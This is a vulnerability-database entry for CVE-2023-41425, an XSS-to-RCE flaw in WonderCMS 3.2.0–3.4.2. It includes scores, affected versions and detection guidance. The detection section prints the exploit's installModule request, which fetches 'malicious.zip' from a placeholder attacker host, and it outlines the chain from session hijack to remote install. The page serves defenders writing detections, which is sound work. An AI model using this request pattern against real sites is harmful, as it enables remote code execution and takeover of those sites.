cbcvebase.
CVE-2023-41425
published 2023-11-07

CVE-2023-41425: Cross Site Scripting vulnerability in Wonder CMS v.3.2.0 thru v.3.4.2 allows a remote attacker to execute arbitrary code via a crafted script uploaded to the…

PriorityP356medium6.1CVSS 3.1
AVNACLPRNUIRSCCLILAN
EXPLOIT
EPSS
54.31%
98.9th percentile
Cross Site Scripting vulnerability in Wonder CMS v.3.2.0 thru v.3.4.2 allows a remote attacker to execute arbitrary code via a crafted script uploaded to the installModule component.

Affected

1 ranges
VendorProductVersion rangeFixed in
wondercmswondercms3.2.0 – 3.4.2

Detection & IOCsextracted from sources · hover to see the quote

url/?installModule=http://<xip>:<xport>/malicious.zip&directoryName=pwned&type=themes&token=
  • Detect GET requests to the installModule endpoint with an external URL parameter, which is the XSS-to-RCE delivery mechanism used in this exploit.
  • Detect XSS payload injection targeting the WonderCMS login page via the page parameter, used to deliver the malicious JS to an authenticated admin.
  • Alert on JavaScript executing XMLHttpRequest with withCredentials=true to the installModule endpoint, indicative of the XSS payload pivoting to RCE.
  • Flag ZIP file uploads or remote ZIP fetches via installModule where directoryName=pwned and type=themes, as these are hardcoded attacker-controlled values in the exploit.
  • This is an authenticated vulnerability; monitor for unusual admin-session activity followed by installModule requests fetching external resources.
  • ·The attacker-controlled IP (xip) and port (xport) for the malicious.zip HTTP server are runtime arguments and will vary per attack; no fixed IOC can be derived for these values.
  • ·The exploit requires an authenticated admin session to trigger the installModule endpoint; the XSS vector is used to hijack an active admin session, so detections should account for the two-stage delivery (XSS then RCE).
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.